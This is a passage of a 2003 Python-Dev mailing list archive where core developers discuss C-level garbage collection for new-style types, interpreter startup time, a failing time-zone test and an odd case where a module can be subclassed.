References: <20030516153518.68B1B18EC13@grendel.zope.com>
 <1053099884.1849.49.camel@barry>
Message-ID: <2m7k8qkhfl.fsf@starship.python.net>

Barry Warsaw <barry@python.org> writes:

> On Fri, 2003-05-16 at 11:35, Fred L. Drake wrote:
>> The development version of the documentation has been updated:
>> 
>>     http://www.python.org/dev/doc/devel/
>> 
>> Various updates, including Jim Fulton's efforts on updating the Extending &
>> Embedding manual.
>
> I think this one's gonna make my Python quotes file:
>
> "So, if you want to define a new object type, you need to create a new
> type object."
>
> :)

That's been there since rev 1.1, which I actually wrote...

Cheers,
M.

-- 
  For their next act, they'll no doubt be buying a firewall
  running under NT, which makes about as much sense as
  building a prison out of meringue.                     -- -:Tanuki:-
               -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html


From fdrake@acm.org  Fri May 16 17:11:58 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 16 May 2003 12:11:58 -0400
Subject: [Python-Dev] [development doc updates]
In-Reply-To: <2m7k8qkhfl.fsf@starship.python.net>
References: <20030516153518.68B1B18EC13@grendel.zope.com>
 <1053099884.1849.49.camel@barry>
 <2m7k8qkhfl.fsf@starship.python.net>
Message-ID: <16069.3534.513541.138020@grendel.zope.com>

Michael Hudson writes:
 > That's been there since rev 1.1, which I actually wrote...

That explains why it sounded vaguely familiar.  ;-)  I have actually
read the version you wrote, and didn't find that sentence in need of
changing.

Perhaps Barry is too easily amused?  ;-)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From mwh@python.net  Fri May 16 17:32:53 2003
From: mwh@python.net (Michael Hudson)
Date: Fri, 16 May 2003 17:32:53 +0100
Subject: [Python-Dev] [development doc updates]
In-Reply-To: <16069.3534.513541.138020@grendel.zope.com> ("Fred L. Drake,
 Jr."'s message of "Fri, 16 May 2003 12:11:58 -0400")
References: <20030516153518.68B1B18EC13@grendel.zope.com>
 <1053099884.1849.49.camel@barry> <2m7k8qkhfl.fsf@starship.python.net>
 <16069.3534.513541.138020@grendel.zope.com>
Message-ID: <2m4r3ukg22.fsf@starship.python.net>

"Fred L. Drake, Jr." <fdrake@acm.org> writes:

> Michael Hudson writes:
>  > That's been there since rev 1.1, which I actually wrote...
>
> That explains why it sounded vaguely familiar.  ;-)  I have actually
> read the version you wrote, and didn't find that sentence in need of
> changing.

I must have been in a fairly odd mood when I wrote it -- "A PyObject
is not a very magnificent object" is one of mine, too.

> Perhaps Barry is too easily amused?  ;-)

I don't think documentation should be disallowed from being
entertaining :-) (or short, but that's a different rant)

Cheers,
M.

-- 
  Hey, if I thought I was wrong, I'd change my mind.  :)
                                    -- Grant Edwards, comp.lang.python


From jeremy@zope.com  Fri May 16 17:42:03 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 12:42:03 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <3EC507CB.6080502@zope.com>
References: <3EC507CB.6080502@zope.com>
Message-ID: <1053103323.456.71.camel@slothrop.zope.com>

On Fri, 2003-05-16 at 11:46, Jim Fulton wrote:
> So given that we have a new style type, to add support for GC, we need
> to:
> 
> - Set the Py_TPFLAGS_HAVE_GC type flag,
> 
> - Provide implementations of tp_traverse and tp_clear, as described in
>    the section "Supporting the Cycle Collector" section of the docs.
> 
> - Call PyObject_GC_UnTrack at the beginning of the deallocator,
>    before decrefing any members.
> 
> I think that that is *all* we have to do.
> 
> In particular, since we have a new style type that inherits the
> standard allocator, we don't need to fool with PyObject_GC_New, and
> PyObject_GC_DEL, because the default tp_alloc and tp_free take care of
> that for us. Similarly, we don't need to call PyObject_GC_Track,
> because that is done by the default allocator. (Because of that, our
> traverse function has to check for null object pointers in our
> object's members.)

It depends on how the objects are used in C code.  I've upgraded a lot
of C extensions to make their types collectable recently.  In several
cases, it was necessary to change PyObject_New to PyObject_GC_New and
add a PyObject_GC_Track.  I think the docs ought to explain how to do
this.

It's not clear to me what the one right way to implement a tp_dealloc
slot is.  I've seen two common patterns in the Python source: call
obj->ob_type->tp_free or call PyObject_GC_Del.  The type object
initializes tp_free to PyObject_GC_Del, so in most cases the two
spellings are equivalent.  Calling PyObject_GC_Del feels more
straightforward to me.

This question isn't specific to GC.  Perhaps it's a question of what
tp_free is used for and when it should be called.  Pure-Python classes
and instances have tp_dealloc implementations that call tp_free.  I'm
not sure if that's a generic recommendation for all types written in C.

> Did I get this right? I intend to update the docs to reflect this
> understanding (or a corrected one, of course).

The three items you listed were sufficient for all the types I've worked
on, expecting the issues I noted above.

Jeremy




From jim@zope.com  Fri May 16 18:08:34 2003
From: jim@zope.com (Jim Fulton)
Date: Fri, 16 May 2003 13:08:34 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <1053103323.456.71.camel@slothrop.zope.com>
References: <3EC507CB.6080502@zope.com> <1053103323.456.71.camel@slothrop.zope.com>
Message-ID: <3EC51B12.8070407@zope.com>

Jeremy Hylton wrote:
> On Fri, 2003-05-16 at 11:46, Jim Fulton wrote:
> 
>>So given that we have a new style type, to add support for GC, we need
>>to:
>>
>>- Set the Py_TPFLAGS_HAVE_GC type flag,
>>
>>- Provide implementations of tp_traverse and tp_clear, as described in
>>   the section "Supporting the Cycle Collector" section of the docs.
>>
>>- Call PyObject_GC_UnTrack at the beginning of the deallocator,
>>   before decrefing any members.
>>
>>I think that that is *all* we have to do.
>>
>>In particular, since we have a new style type that inherits the
>>standard allocator, we don't need to fool with PyObject_GC_New, and
>>PyObject_GC_DEL, because the default tp_alloc and tp_free take care of
>>that for us. Similarly, we don't need to call PyObject_GC_Track,
>>because that is done by the default allocator. (Because of that, our
>>traverse function has to check for null object pointers in our
>>object's members.)
> 
> 
> It depends on how the objects are used in C code.  I've upgraded a lot
> of C extensions to make their types collectable recently.  In several
> cases, it was necessary to change PyObject_New to PyObject_GC_New and
> add a PyObject_GC_Track.  I think the docs ought to explain how to do
> this.

If you write types the New Way, there are no PyObject_New calls and
no need to call PyObject_GC_Track.

> It's not clear to me what the one right way to implement a tp_dealloc
> slot is.  I've seen two common patterns in the Python source: call
> obj->ob_type->tp_free or call PyObject_GC_Del.  The type object
> initializes tp_free to PyObject_GC_Del, so in most cases the two
> spellings are equivalent.  Calling PyObject_GC_Del feels more
> straightforward to me.

You need to call obj->ob_type->tp_free to support subclassing.

I suggest that every new type should call obj->ob_type->tp_free
as a matter of course.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From mal@lemburg.com  Fri May 16 18:09:48 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 16 May 2003 19:09:48 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <1052927757.7258.38.camel@slothrop.zope.com>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]> <1052927757.7258.38.camel@slothrop.zope.com>
Message-ID: <3EC51B5C.2080307@lemburg.com>

Jeremy Hylton wrote:
> The use of re in the warnings module seems the primary culprit, since it
> pulls in re, sre and friends, string, and strop.

FWIW, I've removed the re usage from encodings/__init__.py.

Could you check whether this makes a difference in startup time
now ?

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 16 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        39 days left



From barry@python.org  Fri May 16 18:21:04 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 13:21:04 -0400
Subject: [Python-Dev] [development doc updates]
In-Reply-To: <2m4r3ukg22.fsf@starship.python.net>
References: <20030516153518.68B1B18EC13@grendel.zope.com>
 <1053099884.1849.49.camel@barry> <2m7k8qkhfl.fsf@starship.python.net>
 <16069.3534.513541.138020@grendel.zope.com>
 <2m4r3ukg22.fsf@starship.python.net>
Message-ID: <1053105659.2342.2.camel@barry>

On Fri, 2003-05-16 at 12:32, Michael Hudson wrote:

> I must have been in a fairly odd mood when I wrote it -- "A PyObject
> is not a very magnificent object" is one of mine, too.

That's the other one I enjoyed!

> > Perhaps Barry is too easily amused?  ;-)

That may be true, but it /did/ have a nice lyrical quality to it.  I'm
not saying it should be change!  In fact we need more documentation like
that <wink>.

-Barry




From mal@lemburg.com  Fri May 16 18:25:04 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 16 May 2003 19:25:04 +0200
Subject: [Python-Dev] test_time fails with current CVS
Message-ID: <3EC51EF0.3080701@lemburg.com>

Just thought you'd like to know:

test test_time failed -- Traceback (most recent call last):
   File "/home/lemburg/projects/Python/Dev-Python/Lib/test/test_time.py", line 107, in test_tzset
     self.failUnless(time.tzname[1] == 'AEDT', str(time.tzname[1]))
   File "/home/lemburg/projects/Python/Dev-Python/Lib/unittest.py", line 268, in failUnless
     if not expr: raise self.failureException, msg
AssertionError: AEST

In case it helps: I live on the northern hemisphere :-)

BTW, the correct time zone names are: EAST and EADT -- perhaps
that's what's causing the problem ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 16 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        39 days left



From jeremy@zope.com  Fri May 16 18:35:33 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 13:35:33 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <3EC51B12.8070407@zope.com>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com>  <3EC51B12.8070407@zope.com>
Message-ID: <1053106533.453.78.camel@slothrop.zope.com>

On Fri, 2003-05-16 at 13:08, Jim Fulton wrote:
> If you write types the New Way, there are no PyObject_New calls and
> no need to call PyObject_GC_Track.

I don't follow.  There are plenty of types that are garbage collectable
that also use PyObject_GC_New.  One example is PyDict_New().  If
something is widespread in the Python source tree (a common source of
example code for programmers), it ought to be documented.

> > It's not clear to me what the one right way to implement a tp_dealloc
> > slot is.  I've seen two common patterns in the Python source: call
> > obj->ob_type->tp_free or call PyObject_GC_Del.  The type object
> > initializes tp_free to PyObject_GC_Del, so in most cases the two
> > spellings are equivalent.  Calling PyObject_GC_Del feels more
> > straightforward to me.
> 
> You need to call obj->ob_type->tp_free to support subclassing.
> 
> I suggest that every new type should call obj->ob_type->tp_free
> as a matter of course.

If the type is going to support subclassing.

Jeremy




From guido@python.org  Fri May 16 18:37:21 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 16 May 2003 13:37:21 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: "Your message of 16 May 2003 12:42:03 EDT."
 <1053103323.456.71.camel@slothrop.zope.com>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com>
Message-ID: <200305161737.h4GHbLl06562@pcp02138704pcs.reston01.va.comcast.net>

> It's not clear to me what the one right way to implement a tp_dealloc
> slot is.  I've seen two common patterns in the Python source: call
> obj->ob_type->tp_free or call PyObject_GC_Del.  The type object
> initializes tp_free to PyObject_GC_Del, so in most cases the two
> spellings are equivalent.  Calling PyObject_GC_Del feels more
> straightforward to me.

But calling tp_free is more correct.  This allows a subclass to change
the memory allocation policy.  (This is also important if a base class
is not collectible but a subclass is -- then it's essential that the
base class dealloc handler calls tp_free.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@zope.com  Fri May 16 19:12:33 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 14:12:33 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <200305161737.h4GHbLl06562@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com>
 <200305161737.h4GHbLl06562@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1053108753.457.100.camel@slothrop.zope.com>

On Fri, 2003-05-16 at 13:37, Guido van Rossum wrote:
> > It's not clear to me what the one right way to implement a tp_dealloc
> > slot is.  I've seen two common patterns in the Python source: call
> > obj->ob_type->tp_free or call PyObject_GC_Del.  The type object
> > initializes tp_free to PyObject_GC_Del, so in most cases the two
> > spellings are equivalent.  Calling PyObject_GC_Del feels more
> > straightforward to me.
> 
> But calling tp_free is more correct.  This allows a subclass to change
> the memory allocation policy.  (This is also important if a base class
> is not collectible but a subclass is -- then it's essential that the
> base class dealloc handler calls tp_free.)

There are dozens of objects in Python that do not call tp_free.  For
example, range object's have a tp_dealloc that is set to PyObject_Del().
Should we change those?  Or should we say that it's okay to call
PyObject_Del() and PyObject_GC_Del() from objects that are not intended
to be subclassed?

(patch pending :-)

Jeremy




From tim@zope.com  Fri May 16 19:12:12 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 14:12:12 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <200305161737.h4GHbLl06562@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCEJAFLAA.tim@zope.com>

[Guido]
> But calling tp_free is more correct.  This allows a subclass to change
> the memory allocation policy.  (This is also important if a base class
> is not collectible but a subclass is -- then it's essential that the
> base class dealloc handler calls tp_free.)

I think the scoop is that cyclic gc got added before new-style classes, so
at the time new-style classes were introduced *all* tp_dealloc slots for
gc'able types called the gc del function directly.  After that, I expect the
only ones that got changed were those reviewed (lists, tuples, dicts, ...)
as part of making test_descr.py's subclass-from-builtin tests work.

Jeremy is rummaging thru current CVS now changing the others (frames,
functions, ...).  Does this count as a bugfix, i.e. should it be backported
to 2.2.3?



From guido@python.org  Fri May 16 19:23:51 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 16 May 2003 14:23:51 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: "Your message of 16 May 2003 14:12:33 EDT."
 <1053108753.457.100.camel@slothrop.zope.com>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com>
 <200305161737.h4GHbLl06562@pcp02138704pcs.reston01.va.comcast.net>
 <1053108753.457.100.camel@slothrop.zope.com>
Message-ID: <200305161823.h4GINpR06675@pcp02138704pcs.reston01.va.comcast.net>

> There are dozens of objects in Python that do not call tp_free.  For
> example, range object's have a tp_dealloc that is set to PyObject_Del().
> Should we change those?  Or should we say that it's okay to call
> PyObject_Del() and PyObject_GC_Del() from objects that are not intended
> to be subclassed?

If those types don't have the Py_TPFLAGS_BASETYPE flag set, they're
okay.  Otherwise they should be fixed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri May 16 19:24:24 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 16 May 2003 14:24:24 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: "Your message of Fri, 16 May 2003 14:12:12 EDT."
 <BIEJKCLHCIOIHAGOKOLHCEJAFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHCEJAFLAA.tim@zope.com>
Message-ID: <200305161824.h4GIOOf06688@pcp02138704pcs.reston01.va.comcast.net>

> Jeremy is rummaging thru current CVS now changing the others
> (frames, functions, ...).  Does this count as a bugfix, i.e. should
> it be backported to 2.2.3?

For the ones that are subclassable in 2.2.3, yes.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake@acm.org  Fri May 16 19:36:44 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 16 May 2003 14:36:44 -0400
Subject: [Python-Dev] a strange case
Message-ID: <16069.12220.217558.569689@grendel.zope.com>

Here's a strange case we just ran across, led along by a typo in an
import statement.  This is using the head of the 2.2.x maintenance
branch; I've not tested this against the trunk yet.

>>> import os
>>> class Foo(os):
...   pass
...
>>> Foo
<module '?' (built-in)>

I suspect this isn't intentional behavior.  ;-)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From barry@python.org  Fri May 16 19:44:39 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 14:44:39 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: <16069.12220.217558.569689@grendel.zope.com>
References: <16069.12220.217558.569689@grendel.zope.com>
Message-ID: <1053110679.2342.4.camel@barry>

On Fri, 2003-05-16 at 14:36, Fred L. Drake, Jr. wrote:
> Here's a strange case we just ran across, led along by a typo in an
> import statement.  This is using the head of the 2.2.x maintenance
> branch; I've not tested this against the trunk yet.
> 
> >>> import os
> >>> class Foo(os):
> ...   pass
> ...
> >>> Foo
> <module '?' (built-in)>
> 
> I suspect this isn't intentional behavior.  ;-)

No, it's not, and in 2.3 you get an error (albeit a TypeError with a
rather unhelpful message).  I guess the "fix" hasn't been backported.

-Barry




From jeremy@zope.com  Fri May 16 19:50:00 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 14:50:00 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: <1053110679.2342.4.camel@barry>
References: <16069.12220.217558.569689@grendel.zope.com>
 <1053110679.2342.4.camel@barry>
Message-ID: <1053111000.456.111.camel@slothrop.zope.com>

On Fri, 2003-05-16 at 14:44, Barry Warsaw wrote:
> No, it's not, and in 2.3 you get an error (albeit a TypeError with a
> rather unhelpful message).  I guess the "fix" hasn't been backported.

I think we decided this wasn't a pure bugfix :-).  Some poor soul may
have code that relies on being able to subclass a module.

Jeremy




From fred@zope.com  Fri May 16 19:49:38 2003
From: fred@zope.com (Fred L. Drake, Jr.)
Date: Fri, 16 May 2003 14:49:38 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: <16069.12220.217558.569689@grendel.zope.com>
References: <16069.12220.217558.569689@grendel.zope.com>
Message-ID: <16069.12994.728753.504190@grendel.zope.com>

I wrote:
 > Here's a strange case we just ran across, led along by a typo in an
 > import statement.  This is using the head of the 2.2.x maintenance
 > branch; I've not tested this against the trunk yet.

Ok, the trunk does a little better, but the error message is a little
confusing:

Python 2.3b1+ (#2, May 16 2003, 14:42:51)
[GCC 2.96 20000731 (Red Hat Linux 7.3 2.96-113)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> class Foo(os):
...   pass
...
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes at most 2 arguments (3 given)
>>> class Foo(os, sys):
...   pass
...
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes at most 2 arguments (3 given)



  -Fred

-- 
Fred L. Drake, Jr.  <fred at zope.com>
PythonLabs at Zope Corporation


From fdrake@acm.org  Fri May 16 19:56:47 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 16 May 2003 14:56:47 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: <1053111000.456.111.camel@slothrop.zope.com>
References: <16069.12220.217558.569689@grendel.zope.com>
 <1053110679.2342.4.camel@barry>
 <1053111000.456.111.camel@slothrop.zope.com>
Message-ID: <16069.13423.156806.769779@grendel.zope.com>

Jeremy Hylton writes:
 > I think we decided this wasn't a pure bugfix :-).  Some poor soul may
 > have code that relies on being able to subclass a module.

I just played with one of these things; they're as vaccuous as modules
can possibly be!  If anyone depends on this, they're insane.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From skip@pobox.com  Fri May 16 20:00:24 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 14:00:24 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <3EC51B5C.2080307@lemburg.com>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
 <3EC51B5C.2080307@lemburg.com>
Message-ID: <16069.13640.892428.185711@montanaro.dyndns.org>

    mal> FWIW, I've removed the re usage from encodings/__init__.py.

    mal> Could you check whether this makes a difference in startup time
    mal> now?

Well...  Not really, but it's not your fault.  site.py imports
distutils.util which imports re.  It does a fair amount of regex compiling,
some at the module level, so deferring "import re" may take a couple minutes
of work.  Hang on...

Okay, now re isn't imported.  The only runtime difference between the two
sets of times below is encodings/__init__.py 1.18 vs 1.19.  Each set of
times is for this command:

    % time ./python.exe -c pass

Everything was already byte compiled.  The times reported were the best of
five.  I tried to quiet the system as much as possible.  Still, since the
amount of work being done is minimal, it's tought to get a good feel for any
differences.

    version 1.18 (w/ re)

    real    0m0.143s
    user    0m0.030s
    sys     0m0.060s

    version 1.19 (no re)

    real    0m0.142s
    user    0m0.040s
    sys     0m0.060s

Note the rather conspicuous lack of any difference.  The only modifications
to my Lib tree are these:

    M cgitb.py
    M warnings.py
    M distutils/util.py
    M encodings/__init__.py
    M test/test_bsddb185.py

I verified that site was imported from my Lib tree:

    % ./python.exe -v -c pass 2>&1 | egrep 'site'
    # /Users/skip/src/python/head/dist/src/build.opt/../Lib/site.pyc matches /Users/skip/src/python/head/dist/src/build.opt/../Lib/site.py
    import site # precompiled from /Users/skip/src/python/head/dist/src/build.opt/../Lib/site.pyc
    # cleanup[1] site

It would appear that the encodings stuff isn't getting imported on my
platform (Mac OS X):

    % ./python.exe -v -c pass 2>&1 | egrep 'encoding'
    %

Looking at site.py shows that the encodings package is only imported on
win32 and only if the codecs.lookup() call fails.  Oh well, we don't care
about minority platforms. ;-) More seriously, to test your specific change
someone will have to run the check Windows.

To contribute something maybe positive, here's the same timing comparison
using my changed version of distutils.util vs CVS:

    CVS:

    real    0m0.155s
    user    0m0.050s
    sys     0m0.070s

    Changed (no module-level re import):

    real    0m0.143s
    user    0m0.070s
    sys     0m0.040s

It appears eliminating "import re" has only a very small effect for me.  It
looks like an extra 6 modules are imported (25 vs 19).

Skip


From barry@python.org  Fri May 16 20:09:31 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 15:09:31 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <16069.13640.892428.185711@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com> <3EC51B5C.2080307@lemburg.com>
 <16069.13640.892428.185711@montanaro.dyndns.org>
Message-ID: <1053112171.2342.7.camel@barry>

On Fri, 2003-05-16 at 15:00, Skip Montanaro wrote:

> Well...  Not really, but it's not your fault.

Skip, you're going about this all wrong.  We already have the technology
to start Python up blazingly fast.  All you have to do <wink> is port
XEmacs's unexec code.  Then you load up Python with all the modules you
think you're going to need, unexec it, then the next time it starts up
like lightening.  Disk space is cheap!

-Barry




From jeremy@zope.com  Fri May 16 20:07:53 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 16 May 2003 15:07:53 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <16069.13640.892428.185711@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com> <3EC51B5C.2080307@lemburg.com>
 <16069.13640.892428.185711@montanaro.dyndns.org>
Message-ID: <1053112072.451.114.camel@slothrop.zope.com>

On Fri, 2003-05-16 at 15:00, Skip Montanaro wrote:
>     mal> FWIW, I've removed the re usage from encodings/__init__.py.
> 
>     mal> Could you check whether this makes a difference in startup time
>     mal> now?
> 
> Well...  Not really, but it's not your fault.  site.py imports
> distutils.util which imports re.  It does a fair amount of regex compiling,
> some at the module level, so deferring "import re" may take a couple minutes
> of work.  Hang on...

I don't think you need to do anything to distutils.  In the case we care
about (an installed Python) distutils.utils isn't imported.  Check this
code in site.py:

# Append ./build/lib.<platform> in case we're running in the build dir
# (especially for Guido :-)
# XXX This should not be part of site.py, since it is needed even when
# using the -S option for Python.  See http://www.python.org/sf/586680
if (os.name == "posix" and sys.path and
    os.path.basename(sys.path[-1]) == "Modules"):
    from distutils.util import get_platform
    s = "build/lib.%s-%.3s" % (get_platform(), sys.version)
    s = os.path.join(os.path.dirname(sys.path[-1]), s)
    sys.path.append(s)
    del get_platform, s

Jeremy




From amk@amk.ca  Fri May 16 20:09:51 2003
From: amk@amk.ca (A.M. Kuchling)
Date: Fri, 16 May 2003 15:09:51 -0400
Subject: [Python-Dev] Re: Startup time
In-Reply-To: <16069.13640.892428.185711@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>        <1052927757.7258.38.camel@slothrop.zope.com>        <3EC51B5C.2080307@lemburg.com> <16069.13640.892428.185711@montanaro.dyndns.org>
Message-ID: <ba3cun$1vk$1@main.gmane.org>

Skip Montanaro wrote:
> Well...  Not really, but it's not your fault.  site.py imports
> distutils.util which imports re.  

Note that this doesn't apply to an installed Python; that import is only 
done when running the interpreter from the build directory.

--amk




From skip@pobox.com  Fri May 16 20:16:09 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 14:16:09 -0500
Subject: [Python-Dev] a strange case
In-Reply-To: <1053111000.456.111.camel@slothrop.zope.com>
References: <16069.12220.217558.569689@grendel.zope.com>
 <1053110679.2342.4.camel@barry>
 <1053111000.456.111.camel@slothrop.zope.com>
Message-ID: <16069.14585.371615.56117@montanaro.dyndns.org>

    Jeremy> On Fri, 2003-05-16 at 14:44, Barry Warsaw wrote:
    >> No, it's not, and in 2.3 you get an error (albeit a TypeError with a
    >> rather unhelpful message).  I guess the "fix" hasn't been backported.

    Jeremy> I think we decided this wasn't a pure bugfix :-).  Some poor
    Jeremy> soul may have code that relies on being able to subclass a
    Jeremy> module.

How about at least deprecating that feature in 2.2.3 and warning about it so
that poor soul knows this won't be supported forever?

Skip


From skip@pobox.com  Fri May 16 20:19:03 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 14:19:03 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <1053112072.451.114.camel@slothrop.zope.com>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
 <3EC51B5C.2080307@lemburg.com>
 <16069.13640.892428.185711@montanaro.dyndns.org>
 <1053112072.451.114.camel@slothrop.zope.com>
Message-ID: <16069.14759.862301.686434@montanaro.dyndns.org>

    Jeremy> I don't think you need to do anything to distutils.  In the case
    Jeremy> we care about (an installed Python) distutils.utils isn't
    Jeremy> imported.  Check this code in site.py:

Ah, thanks.  That's the code I saw, but I didn't consider the preface
comment.

Skip


From tim@zope.com  Fri May 16 20:29:54 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 15:29:54 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: <3EC507CB.6080502@zope.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEJJFLAA.tim@zope.com>

[Jim Fulton]
> ...
> I'll also note that most new-style types don't need and thus don't
> implement custom allocators. They leave the tp_alloc and tp_free slots
> empty.

I'm worried about half of that:  tp_free is needed to release memory no
matter whether obtained in a standard or custom way.  I don't think tp_free
slots always get filled in to something non-NULL by magic, and in the
current Python source almost all new-style C types explicitly define a
tp_free function (the exceptions are "strange" in some way).

PEP 253 may be partly out of date here -- or not.  In the section on
creating a subclassable type, it says:

"""
   The base type must do the following:

      - Add the flag value Py_TPFLAGS_BASETYPE to tp_flags.

      - Declare and use tp_new(), tp_alloc() and optional tp_init()
        slots.

      - Declare and use tp_dealloc() and tp_free().

      - Export its object structure declaration.

      - Export a subtyping-aware type-checking macro.
"""

This doesn't leave a choice about defining tp_alloc() or tp_free() -- it
says both are required.  For a subclassable type, I believe both must
actually be implemented too.

For a non-subclassable type, I expect they're optional.  But if you don't
define tp_free in that case, then I believe you must also not do the

    obj->ob_type->tp_free(obj)

business in the tp_dealloc slot (else it will segfault).



From jim@ZOPE.COM  Fri May 16 20:33:29 2003
From: jim@ZOPE.COM (Jim Fulton)
Date: Fri, 16 May 2003 15:33:29 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <1053106533.453.78.camel@slothrop.zope.com>
References: <3EC507CB.6080502@zope.com>	 <1053103323.456.71.camel@slothrop.zope.com>  <3EC51B12.8070407@zope.com> <1053106533.453.78.camel@slothrop.zope.com>
Message-ID: <3EC53D09.3050505@zope.com>

Jeremy Hylton wrote:
> On Fri, 2003-05-16 at 13:08, Jim Fulton wrote:
> 
>>If you write types the New Way, there are no PyObject_New calls and
>>no need to call PyObject_GC_Track.
> 
> 
> I don't follow.  There are plenty of types that are garbage collectable
> that also use PyObject_GC_New.  One example is PyDict_New().  If
> something is widespread in the Python source tree (a common source of
> example code for programmers), it ought to be documented.

It is documented in the API reference. Perhaps the API reference
should explain that there's a prefered way to do things.

There should be one prefered way to write types. It just happens that
that way is a *new* way and most existing types don't follow that way.

In the how-to style manual, we should only document the one prefered
way to write new types.  We shouldn't describe all of the various
obsolete variations.

It's unfortunate that there aren't many examples of how to do things
the new way, although that's understandable, since the new way wasn't
documented until recently.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From skip@pobox.com  Fri May 16 20:32:40 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 14:32:40 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <1053112171.2342.7.camel@barry>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
 <3EC51B5C.2080307@lemburg.com>
 <16069.13640.892428.185711@montanaro.dyndns.org>
 <1053112171.2342.7.camel@barry>
